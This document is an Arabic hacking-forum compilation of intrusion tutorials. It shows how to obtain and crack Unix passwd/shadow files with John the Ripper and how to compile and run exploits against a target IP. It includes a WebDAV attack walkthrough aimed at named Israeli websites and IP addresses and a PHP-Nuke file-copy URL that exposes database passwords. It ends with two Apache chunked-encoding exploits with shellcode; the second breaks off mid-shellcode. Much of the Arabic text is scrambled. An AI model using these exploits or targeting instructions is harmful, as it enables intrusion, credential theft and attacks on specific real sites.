بيرل بلغة مكتوبة pl.* ثغراتبرنامج لديك كان إذا ويندوز في لينوكسأو في استخدامها  ويمكن

Active Perlسي بلغة ثغرات

*.c لينوكسفقط في استخدامها يمكنشل بلغة ثغرات

*.sh لينوكسفقط في استثمارها ويمكنبلينوكسفيمواقع الخاصة السابقة األنواع من الكثير إيجاد ويمكنك

بعضها وإليك الثغراتwww.securiteam.com

www.securityfocus.comwww.ukrt.f2s.com

www.ussrback.comwww.packetstorm.securify.com

www.secureroot.comwww.rootshell.com

في الموجودة بالبرامج عنها الكشف يمكنك المتصفح ثغرات أماالبرامج .قسم

أو كالمنتديات السيرفر على الموجودة البرامج خالل من ويمكنكمواقع في لها ثغرات عن تبحث أن آي وسيجي بيرل برمجيات

. تكون قد آي جي وسي بيرل وبرمجيات السابقة المواقع أو الثغراتزوار عداد حتى أو بحث محرك أو زوار كتاب

.. أن المشكلة الباسوورد ملف على حصلت أنك لنفرض حسنامضللة بداخله تكون مشفرة shadowed كلمةالسر .encryption أو

باسوورد لملف مثالroot:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/:

bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail

Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp 

المرخص األشخاص سر كلمات على يحتوي الباسوورد ملف وألنآالف يصل وقد أسطر عشرة عن بزيد ال قد الموقع بدخول لهم

...األسطرعالمة وهي مضللة السابقة السر x كلمات تختلف ..وقد

هكذا تكون عليها سنحصل والتي المشفرة :أماroot:x:0:1:Super-User:/:/sbin/sh مضللة

root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh مشفرةroot = المستخدم اسم الجذر أو

x = مضللة ولكنها كلمةالسرمهم غير السطر وباقي

مضللة السر كلمة ستكون األغلب تبحث shadowed في أن عليك لذاالشادو ملف يسمى مشفرة السر كلمة يحوي آخر ملف عن

shadow fileالتشغيل نظام باختالف تختلف معينة أماكن في  ويوجدtoken = الباسوورد عن يعبر الذي الرمز

Linux : /etc/shadow token = *SunOS : /etc/shadow token = هو اشهرها متعدده أشكال * يأخذ

FreeBSD : /etc/master.passwd or /etc/shadow token = * هو والجديدx

IRIX : /etc/shadow token = xAIX : /etc/security/passwd token = !

ConvexOS : /etc/shadow or /etc/shadpw token = *لملفشادو مثال

root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::

adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::

هي السر كلمة أن  نجدEpGw4GekZ1B9U

التشفير؟ تفك كيفبرامج صفحة في تجده أفضلها لذلك مخصصة برامج طريق عن

 الثغراتJohn the ripper

على يحصل حتى الممكنة المحاوالت كل بتجريب يقوم وهو. الباسوورد

وعليك مثال ملفمفكرة في الباسووردات له تضع أن يجب ولكنال من بدال المشفرة الكلمة كل xوضع يكون بحيث ترتيبها وعليك

فيسطر حسابتشغيله :طريقة

الدوسواكتب إلى إذهبjohn passwd

وضعتها passwd حيث المشفرة الباسوورد به الذي الملف هو : سيظهر

by Sola 97,John the Ripper Version 1.3 Copyright )c( 1996

Loaded 1 password

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONEانتر اضغط اآلن يخمنها التي الباسوورد معرفة أردت وإذا

به الذي نفسالمجلد ملففي في ستحفظ الصحيحة والباسوورداسمه البرنامج

john.potتغيير أو الملف إلغاء عليك أخرى كسر بعملية القيام أردت وإذا

. اسمه

،،،انتهىالثغرات " عن مفصل شبه " شرح

> إعصار منتدى من >منقول> icer:الكاتب<

التالي الى ينقسم اليوم : الموضوع؟ 1 اكسبلويتات تجد كيف

2 ؟ ) ( استثمارات نسميها دعونا االكسبلويتات تستعمل كيفاالستثمارات 3 من مختلفه ... انواع

الثغرات 4 عل للبحث مفيده ... مواقع××××××××××××××××××××××××××××××××××××××××××××××××××

×××××××××××××××××××××a face at the interface :

نظام عل الرووت عل تحصل لكي عاده تستخدم االستثماراتعباره .. هو الرووت و  معين

تريد الذي النظام مدير او االدمينيستراتور عنتوجد ... ما دايما االستثمارات  اختراقه

ال بواسطه الدخول تستطيع يجعك معين ملف بصوره http بواسطه.. طبيعبه

نستخدم من .... scanner لذلك العديد جد يو االستثمار هذا عن لبحثمثل االستثمارات

BOF )buffer over flow( , DoS ) denial of service( , ال هجوم ال ان اؤمن ا انا فكره على اكسبلويت DoS و ... هي

عرضو مثل بعضاالوامر تنفيذ لك تتيح التي الثغرات ايضا يوجد والملفات على الكتايه و  مسح

فهو .... فلو اوفر البوفر لموضوع بالنسبه غيرها و االكستينشنز مثكبير حد الى  يشبه

و DoS ال المعلومات بفيضمن السيرفير ارباك على يعتمد حيثالرووت . يمنحك

ال هجوم ارسال DoS اما عن عباره السيرفير GET / POST فهو الال يؤدي مما

هو ) OVERLOAD حدوث اللي للسيرفير المركزيه المعالجه لوحدهيعمل جهاز عن عباره

السيرفير ( 24 يصبح و العمل عن الموقع فيتوقف ساعهOFFLINE ....

×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

؟ 1 استثمارات تجد كيفعليك يجب فانه سيرفير في معينه ثغره تستثمر ان تستطيع لكي

السيرفير في موجوده الثغره ان تتاكد ان اوالطريقتين .. يوجد فانه معين فايل عن عباره االستثمار كان لما و

ال ام موجوده الثغره كانت اذا ما ..لمعرفهحاله في كما المتصفح خالل من مباشره التطبيق طريق عن اما

بيج الفرونت او اليونيكود مثل امتصفح بعضثغراتان .. المعروف من طبعا الموقع فحص في السكانرز تستخدم ان او

ال سكانرز لها المتصفح threads ثغراتال تسمى هي بها cgi scaners و ملفات له تضيف ان ممكن بعضها

جاهزا يكون البعضاالخر و .. ثغراتاحبذه ان و السكانرز من اخر نوع هناك shadow security scaner... و

<<<..... احدث بها تجد ان يمكن التي المواقع احسن من فكره على

هو على rootshell.com الثغرات يحتوي هو  واو واحده كلمه عن عباره للبحث مفتاح تضع ان يكفي بحث محركمثل تحتوي red hat 7.2 كلمتان التي الثغرات من العديد تجد سوف و

علىred hat 7.2 ......

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

؟؟ 2 الثغرات هذه تستغل كيفبسكانر موقع يفحصون الناسعندما من ( الكثير ال خاصه shadow و

ايشيسوون .. ) يعرفون ال معينه استثمارات لهم يطلع  وكذا؟؟؟؟ ...بعد

حتالقي الشادو بتستعمل انت ده .. url لو العنوان تزرو الثغره بجانبهناك تالقيها كلمه كل تقره .. و

اي تجد لم اذا و url او اثغره اسم تاخد يبقى االخرى السكانرز فيالموقع  rootshell.com تروح

في الله شاء ان انت و الثغره اسم البحث محرك في تكتب %99و الثغره لهاي استثمار بتالقي الحاالت ..من

كده زي اشياء و تستخدمها كيف ....... و

×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

االستثمارات 3 من مختلفه : انواععلى الرووت منحك هو هدفها يكون االستثمارات من الكثير طبعا

المدير .. هو رووت كلمه معنى السيرفيرال .. على قيود اي يوجد ال االدمين الرووت commands او اللي

السيرفير .. على الصالحيات كل لك اي يكتبهاالثغرات من العديد خالل من يتم ان يمكن الرووت على الحصول و

ال ثغرات ال , http مثل غيرها BOF و .. وصالحيه .. لك تعطي قد فهي الثغرات عمل طريقه على تعتمد كها

ايضا و الملفات عل الكتابه و حذف و قراءه

السيرفير الى ملفات .... رفعواضحه صوره في اما اليوزر اسم و السريه الكلمه لك تعطي قد او

الملف بمقياس config.inc مثل مشفره اوDES/MD5 ... الملف في اليونيكس .... etc/passwd/ كما انظمه ... في

ال هجوم كبير حد الى يشبه فهو فلو اوفر للبفر و DoS بالنسبهيسببه مثلما للسيرفير ضرر يسبب ال لكنه

ال عن DoSهجوم عباره البفر يكون االحيان اغلب في انه المهمباعطائك دائما تنتهي للسيرفير اوامر ارسال

من ... هائل لكم السيرفير استقبال بسبب هذا و الرووت صالحيهالسيرفير ارباك الى فيؤدي .. الداتا

×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

خاللها 4 من الثغرات عن للبحث مفيده : مواقعالمواقع هذه في الجديده االستثمارات عن البحث : يمكنك

packetstorm.securify.com /.securityfocus.com /www.insecure.org www.rootshell.com/  المزيد تجد ابحثسوف غيرها  و .

،،،انتهى

الثغرات " تستخدم

>منقول<>oOoDa BE$T :الكاتب<

:البداية

: .txt  .. سورسكود على يحتوي اي الممكن من ملفنصي ملف ويعني

.. القراءة , اكمل البير بالسي المكتوبة البرامج او الثغرات لبعضاستخدامها كيفية ..لتعرف

: .c .. كتابتها يتم الثغرات واغلب فقط سورسكود لكنه سي برنامج هو

يفترضعليك.. هذا  بالسيعمل ثم تحميله _ )compile( عليك السورسكود تحويل يعني وهذا ... _) يمكن ) لن انه هنا المشكلة لكن بتشغيله تثوم ثم برنامج لملف .. عندك يكون ان فيجب ويندوز بيئة تحت Shell او Linux تشغيلها

Account ..اكتب ثم المفل به الموجود للمسار توجه التحميل :بعض

gcc filenmae.c ----> الكومبايل امرالملف :سينتج

a.out ---> الناتج البرنامج ..وهو

ينقصك؟؟ ماذا واالنعليه تطبق ان تريد الذي الموقع اسم او بي اي معك يكون ان يجب

..الثغرة

:كمثال./a.out xxx.xxx.xxx.xxx

بالبيرل المكتوبة :للثغرات

: .pl .. تحتاج ايضا لتشغيله بيرل  Shell Account او Linux برنامج

كان اكتب exploit اذا موقع على تطبقه ان :واردتperl filename.pl xxx.xxx.xxx.xxx 

او./filename xxx.xxx.xxx.xxx 

،،،انتهى

الثغرة " هذه مع اإلسرائيلية المواقع بإختراق " تمتع

> الحزم شبكة منتديات من >منقول>DeadLine :الكاتب<

 : الشرحسيرفرات على تطبق أخوان يا الثغره  : اوال

Microsoft-IIS/5.0 on Windows 2000 

وندوز لنا يقدمها بسيطه اداه هي مانحتاجه كل أخوان ال 98يا وانني النني ال ام لخاصيه هذه مثل تمتلك االخرى النسخ كانت ان اعلم

ووندوز لينكسماندريك فقط نظامين على فقط 98اعمل :

هي Web Folders : االداه

الثغره هذه نجد  : اينالتاليه الخطوات في انشاءلله نجدها سوف : حسنا

على  My Computer ادخل

داخل بل آخر شيء او السي ليسداخل هناك ستجدها My ثمComputer آخره الى والدي السي مع هي تكون يعني  فقط

المسمى الملف أخون يا  Web Folders نفتح

اآلتي سنجد  : ثم

Add Web Folder لالختراق المهمه اداتنا ستكون التي هي  حيث

ال  : Add Web Folder نفتح

كلمة نجد  Type the location to add حيث

اآلتي بأدخال نقوم مستطيل تحتها  : ونرى

http://hostname.com/ان وليس hostname حيث الموقع ايبي قلنا انتبه الموقع ايبي هو

 االسمدروسكثيره وهناك الموقع تبع االيبي يخرج كيف يعرف والجميع

الموضوع  بخصوصهذا

موحد ايبي على تعمل انها حيث للتطيبق اسرائيليه مواقع  : وهذهmail.talcar.co.il

daihatsu-israel.co.ildaewoo-israel.co.il

ذكره تم الذي بالمستطيل  : ندخلhttp://192.117.143.121/

كلمة على نضغط  Next : ثم

خاصية وتعطيك الموقع ملفات بتحميل االداه تعمل سوف وهناالملفات وازالة تحميل وهي  االدمن

كلمة لك تظهر التحميل من البرنامج ينتهي ان  finish : فبعد

ال الى تذهب ومسمى Web Folder : عندها هناك الموقع ملف وتجدالموقع ايبي  تحت

للتطبيق اخر : موقع

http://www.israwine.co.il/ 212.199.43.84

الثغره : ان فأعرف نيم ويوزر باسوورد ادخال طلب تم اذا مالحظه مغلقه

مغلقه الثغره ان فمعناه ملف اي تجد ولم الملفات الى دخلت اذا او ايضا

امين اللهم امين اللهم والعافيه التوفيق الله .اسئل،،،انتهى

نيوك ".27 " ثغرة

 >منقول<<Arab VireruZ :الكاتب<

باألنقليزية : الشرح

twlc: here your 0day from LucisFero and supergatePosted on Monday, September 24 @ 14:25:58 CDT 

topic: advisories twlc security divison

24/09/2001

Php nuke BUGGED.

Found by:LucisFero and supergate

./twlc

SummaryThis time the bug is really dangerous...it allows you to 'cp' any file

on the box... or even upload files... 

Systems Affectedall the versions ARE vulnerable

except '5.0 RC1' )i wonder why a released c. is ok while the final 5.2 is bugged(

ExplanationDo you need sql password?

http://www.server.net/admin.php?uplo...ame=hacked.txt 

the admin 'login' page will be prompted just go to http://www.server.net/images/hacked.txt and you will see

config.php that as everyone knows contain the sql's passwords, you can even upload files...i leave you the 'fun' to find all the ways

to use it... and try to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO LET YOU HAVE

FUN.

let me explain you the bug... admin.php contains this routine: $basedir = dirname)$SCRIPT_FILENAME(;

$textrows = 20;$textcols = 85;

$udir = dirname)$PHP_SELF(;if)!$wdir( $wdir="/";

if)$cancel( $op="FileManager";if)$upload( {

copy)$userfile,$basedir.$wdir.$userfile_name(; $lastaction = ""._UPLOADED." $userfile_name --< $wdir";

// This need a rewrite -------------------------------------< OMG! WE TOTALY AGREEEEEEEE lmao

//include)"header.php"(;//GraphicAdmin)$hlpfile(;

//html_header)(;

//displaydir)(;$wdir2="/";

chdir)$basedir . $wdir2(;//CloseTable)(;

//include)"footer.php"(;Header)"Location: admin.php?op=FileManager"(;

exit;}

that doesnt do a check to see if you are logged as admin or no... so you can use it anyway...

Solutionwe erased the function... cause we wanted to re**** the file

manager anyway but i suggest you to do the same... -to upload files use FTP-

conclusions:yet another bug of php nuke... this software is used by thousands

of people... )we run something based on it too( i hope that this time the author will reply soon and will release a patch too! as i

said before just dont try to be a script kiddie or we simply WONT post anymore this kind of advisories. Prolly the funny thing is that who first discovered the bug was LucisFero that... 2 hours before didnt knew php ... so i )supergate( fear him and you should too.

posted at:http://www.twlc.net article http://www.twlc.net/article.php?sid=421

bugtraq@securityfocus.comhttp://www.phpnuke.org -good luck-

http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal System 

and of course mailed to the author of php nuke

contacts )bugs, ideas, insults, cool girls... remember that trojans are directed to /dev/null(:

lucisfero@twlc.netsupergate@twlc.net

http://www.twlc.net )yes we are patched(

peace out pimps. bella a tutti.

eof

=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

البرمجي :الخطأ

$basedir = dirname)$SCRIPT_FILENAME(;$textrows = 20;$textcols = 85;

$udir = dirname)$PHP_SELF(;if)!$wdir( $wdir="/";

if)$cancel( $op="FileManager";if)$upload( {

copy)$userfile,$basedir.$wdir.$userfile_name(; $lastaction = ""._UPLOADED." $userfile_name --< $wdir";

// This need a rewrite -------------------------------------< OMG! WE TOTALY AGREEEEEEEE lmao

//include)"header.php"(;//GraphicAdmin)$hlpfile(;

//html_header)(;//displaydir)(;$wdir2="/";

chdir)$basedir . $wdir2(;//CloseTable)(;

//include)"footer.php"(;Header)"Location: admin.php?op=FileManager"(;

exit;}

=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

:الثغرة

http://www.server.net/admin.php?uplo...ame=hacked.txt

=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

التعديل بعد الثغرة

http://www.server.net/admin.php?uplo...=ultramode.txt

=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

الثغرة :عمل

-= الكونفيج ملف النصي config.php طبع الملف الىالملف ultramode.txtالموجود لطبع نصي ملف تحميل تحتاج لن

بعض :-( وألن واستنتج فكر يعني األنقليزي بالشرح موجود هو كماالدخول سوى عليك ما اآلن الموقع الى التحميل تمنع المواقع

http://server.com/ultramode.txtالىالموقع بيانات لقاعدة التابع باسواليوزر -=وستجد

مالحظاتاختراقه server.com بدل -1 الراد بالموقع

مثال -2 المجلة موقع من http://server.com/nuke : تأكد

اصدار -3 مع تعمل ال الثغرة البعض 5.2هذه يظن كما .

،،،انتهى

" Chunked ثغرة "

> موقع من >angels-bytes منقول

تسمى بثغره سمع ، Apache لـ Chunked كلنا تحدث لعدم السبباآلن angels-bytes موقع ، الموقع إنطالق قبل أتت أنها هو عنها، Retina Apache Chunked Scanner سأضع بفحص تقوم أداة وهي

من الثغره 254نطاق بهذه مصاب منها ما لك وتظهر ، بي آي عنوان .

أباتشي بتنزيل فأنصحك وجودها عند الثغره هذه معالجة أردت إذااآلن 2.0.39 الى األفضل فهو  

التنزيل وصلة هي  هذهhttp://www.apache.org/dist/httpd/binaries

أستثمارين أفضل لكم أضع فسوف الثغره هذه إستثمار لمسألة  أما

أباتشي في إلى 1.3.24الخطأ من 2واعلى 2.0.36إلى 2و -dev ، الخطأ رسائل مع يتعامل الذي البرمجي الروتين في  وهي

لتسببطفح بعيد مهاجم قبل من تستخدمان اإلستثماران هذانفي كتابه إعادة إلى بذلك مؤديه ، المصاب السيرفر في محلي

كود لتنفيذ تسمح ما وبطريقة ،  الذاكرة

قبل ((*/ من وإختبارها تجريبها تم وضعها angels-bytes.com قد قبلهنا )) لكم*/

/* تيم سيكورتي من عليها /*حصلنا#include #include #include #include #include #include #include #include #include #include #include 

#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */

#define RET_ADDR_INC 512

#define MEMCPY_s1_OWADDR_DELTA -146#define PADSIZE_1 4#define PADSIZE_2 5#define PADSIZE_3 7

#define REP_POPULATOR 24#define REP_RET_ADDR 6

#define REP_ZERO 36#define REP_SHELLCODE 24

#define NOPCOUNT 1024

#define NOP 0x41#define PADDING_1 \\'A\\'#define PADDING_2 \\'B\\'#define PADDING_3 \\'C\\'

#define PUT_STRING)s( memcpy)p, s, strlen)s((; p += strlen)s(;#define PUT_BYTES)n, b( memset)p, b, n(; p += n;

#define SHELLCODE_LOCALPORT_OFF 30

char shellcode[] =\\\" \\\\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\

\\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8\\\\x1f\\\"

\\\" \\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a\\

\\x02\\\"\\\" \\\\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\

\\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24\\\\x04\\\"

\\\" \\\\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00\\

\\xb8\\\"\\\" \\\\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff\

\\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08\\\\x03\\\"

\\\" \\\\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b\\\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01\\

\\x89\\\"\\\" \\\\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\

\\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\"

\\\" \\\\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\

\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0\\\\x50\\\"

\\\" \\\\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\

\\xcc\\\";

struct {char *type;

u_long retaddr;} targets[] = { // hehe, yes theo, that say OpenBSD here!

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a },

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae },};

int main)int argc, char *argv[]( {

char *hostp, *portp;unsigned char buf[512], *expbuf, *p;

int i, j, lport;int sock;

int bruteforce, owned, progress;u_long retaddr;

struct sockaddr_in sin, from;

if)argc != 3( {printf)\\\"Usage: %s \\\\n\\\", argv[0](;

printf)\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n\\\"(;printf)\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000

127.0.0.1:8080\\\\n\\\"(;printf)\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n\\\"(;

printf)\\\"Target ID / Target specification\\\\n\\\"(;for)i = 0; i > sizeof)targets(/8; i++(

printf)\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type(;

return -1;}

hostp = strtok)argv[2], \\\":\\\"(;if))portp = strtok)NULL, \\\":\\\"(( == NULL(

portp = \\\"80\\\";

retaddr = strtoul)argv[1], NULL, 16(;if)retaddr > sizeof)targets(/8( {

retaddr = targets[retaddr].retaddr;bruteforce = 0;

}else

bruteforce = 1;

srand)getpid)((;signal)SIGPIPE, SIG_IGN(;

for)owned = 0, progress = 0;;retaddr += RET_ADDR_INC( {

/* skip invalid return adresses */i = retaddr & 0xff;

if)i == 0x0a || i == 0x0d(retaddr++;

else if)memchr)&retaddr, 0x0a, 4( || memchr)&retaddr, 0x0d, 4((continue;

sock = socket)AF_INET, SOCK_STREAM, 0(;sin.sin_family = AF_INET;

sin.sin_addr.s_addr = inet_addr)hostp(;sin.sin_port = htons)atoi)portp((;

if)!progress(printf)\\\"\\\\n[*] Connecting.. \\\"(;

fflush)stdout(;if)connect)sock, )struct sockaddr *( & sin, sizeof)sin(( != 0( {

perror)\\\"connect)(\\\"(;exit)1(;

}

if)!progress(printf)\\\"connected!\\\\n\\\"(;

/* Setup the local port in our shellcode */i = sizeof)from(;

if)getsockname)sock, )struct sockaddr *( & from, &i( != 0( {perror)\\\"getsockname)(\\\"(;

exit)1(;}

lport = ntohs)from.sin_port(;shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;shellcode[SHELLCODE_LOCALPORT_OFF + 0] = )lport << 8( &

0xff;

p = expbuf = malloc)8192 + ))PADSIZE_3 + NOPCOUNT + 1024( * REP_SHELLCODE(

+ ))PADSIZE_1 + )REP_RET_ADDR * 4( + REP_ZERO + 1024( * REP_POPULATOR((;

PUT_STRING)\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n\\\"(;

for )i = 0; i > REP_SHELLCODE; i++( {PUT_STRING)\\\"X-\\\"(;

PUT_BYTES)PADSIZE_3, PADDING_3(;PUT_STRING)\\\": \\\"(;

PUT_BYTES)NOPCOUNT, NOP(;memcpy)p, shellcode, sizeof)shellcode( - 1(;

p += sizeof)shellcode( - 1;PUT_STRING)\\\"\\\\r\\\\n\\\"(;

}

for )i = 0; i > REP_POPULATOR; i++( {PUT_STRING)\\\"X-\\\"(;

PUT_BYTES)PADSIZE_1, PADDING_1(;PUT_STRING)\\\": \\\"(;

for )j = 0; j > REP_RET_ADDR; j++( {*p++ = retaddr & 0xff;

*p++ = )retaddr << 8( & 0xff;*p++ = )retaddr << 16( & 0xff;*p++ = )retaddr << 24( & 0xff;

}

PUT_BYTES)REP_ZERO, 0(;PUT_STRING)\\\"\\\\r\\\\n\\\"(;

}

PUT_STRING)\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\"(;snprintf)buf, sizeof)buf( - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2(;

PUT_STRING)buf(;PUT_BYTES)PADSIZE_2, PADDING_2(;

snprintf)buf, sizeof)buf( - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", MEMCPY_s1_OWADDR_DELTA(;

PUT_STRING)buf(;

write)sock, expbuf, p - expbuf(;

progress++;if))progress%70( == 0(

progress = 1;

if)progress == 1( {memset)buf, 0, sizeof)buf((;

sprintf)buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport %u\\\",

retaddr, )unsigned int()p - expbuf(, lport(;memset)buf + strlen)buf(, \\' \\', 74 - strlen)buf((;

puts)buf(;if)bruteforce(putchar)\\';\\'(;

}else

putchar))rand)(%2(? \\'P\\': \\'p\\'(;

fflush)stdout(;while )1( {fd_set fds;

int n;struct timeval tv;

tv.tv_sec = EXPLOIT_TIMEOUT;tv.tv_usec = 0;

FD_ZERO)&fds(;FD_SET)0, &fds(;

FD_SET)sock, &fds(;

memset)buf, 0, sizeof)buf((;if)select)sock + 1, &fds, NULL, NULL, &tv( < 0( {

if)FD_ISSET)sock, &fds(( {if))n = read)sock, buf, sizeof)buf( - 1(( >= 0(

break;

if)!owned && n <= 4 && memcmp)buf, \\\"\\\\nok\\\\n\\\", 4( == 0( {printf)\\\"\\\\nGOBBLE GOBBLE!@#%%(*#\\\\n\\\"(;

printf)\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr(;sprintf)expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD

local kernel exploit to gain instant r00t\\\\n\\\"(;write)sock, expbuf, strlen)expbuf((;

owned++;}

write)1, buf, n(;}

if)FD_ISSET)0, &fds(( {if))n = read)0, buf, sizeof)buf( - 1(( > 0(

exit)1(;

write)sock, buf, n(;}}

if)!owned(break;

}

free)expbuf(;close)sock(;

if)owned(return 0;

if)!bruteforce( {fprintf)stderr, \\\"Ooops.. hehehe!\\\\n\\\"(;

return -1;}}

return 0;}

Exploit #2:#include #include #include #include #include #include #include #include #include #include #include 

#ifdef __linux__#include 

#endif

#define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field */#define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use

another bug/backdoor/feature )hi Theo!( to gain instant r00t\\';\\\\n\\\"

#define RET_ADDR_INC 512

#define PADSIZE_1 4#define PADSIZE_2 5#define PADSIZE_3 7

#define REP_POPULATOR 24

#define REP_SHELLCODE 24#define NOPCOUNT 1024

#define NOP 0x41#define PADDING_1 \\'A\\'#define PADDING_2 \\'B\\'#define PADDING_3 \\'C\\'

#define PUT_STRING)s( memcpy)p, s, strlen)s((; p += strlen)s(;#define PUT_BYTES)n, b( memset)p, b, n(; p += n;

char shellcode[] =\\\" \\\\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\

\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6\\\\x04\\\\x24\\\"

\\\" \\\\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\\\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1\\

\\xea\\\\x31\\\"\\\" \\\\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\

\\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80\\\\x7c\\\\x24\\\"

\\\" \\\\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\\\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04\\

\\x20\\\\x89\\\"\\\" \\\\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\

\\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24\\\\x14\\\\x89\\\"

\\\" \\\\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\\\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d\\

\\xcd\\\\x80\\\"\\\" \\\\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\

\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff\\\\x04\\\\x24\\\"

\\\" \\\\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51\\

\\x50\\\\xb0\\\"\\\" \\\\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\

\\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\\\x41\\\\x80\\\"

\\\" \\\\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\\\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0\\

\\xb0\\\\x5a\\\"\\\" \\\\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\

\\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\\\xc0\\\\x50\\\"

\\\" \\\\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\\\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68\\

\\x2a\\\\x47\\\"\\\" \\\\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\

\\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04\\

